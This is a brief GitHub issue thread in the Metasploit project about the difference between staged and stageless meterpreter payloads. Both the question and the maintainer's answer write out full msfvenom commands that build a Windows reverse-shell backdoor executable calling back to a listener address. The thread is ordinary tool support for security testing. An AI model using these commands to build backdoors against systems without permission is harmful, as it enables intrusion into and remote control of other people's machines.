### ISSUE TITLE
Is stageless meterpreter no longer supported?

### ISSUE THREAD

**Issue by CaledoniaProject** [rapid7/metasploit-framework#8666]
I was trying to create a stageless meterpreter,

```
msfvenom -p windows/meterpreter/reverse_tcp EXTENSIONS=stdapi,priv LHOST=172.16.177.1 LPORT=4444 -f exe -o 123.exe
```

But the backdoor size is the same as the one created with out `EXTENTIONS=`,

Also, in msfconsole, there's no `set EXTENTIONS=` options as well

Was this feature removed?

**Comment by timwr** [comment]
`windows/meterpreter/reverse_tcp` is staged
`windows/meterpreter_reverse_tcp` is stageless (notice the _).
Try `msfvenom -p windows/meterpreter_reverse_tcp EXTENSIONS=stdapi,priv LHOST=172.16.177.1 LPORT=4444 -f exe -o 123.exe`

**Comment by CaledoniaProject** [comment]
Thanks timwr
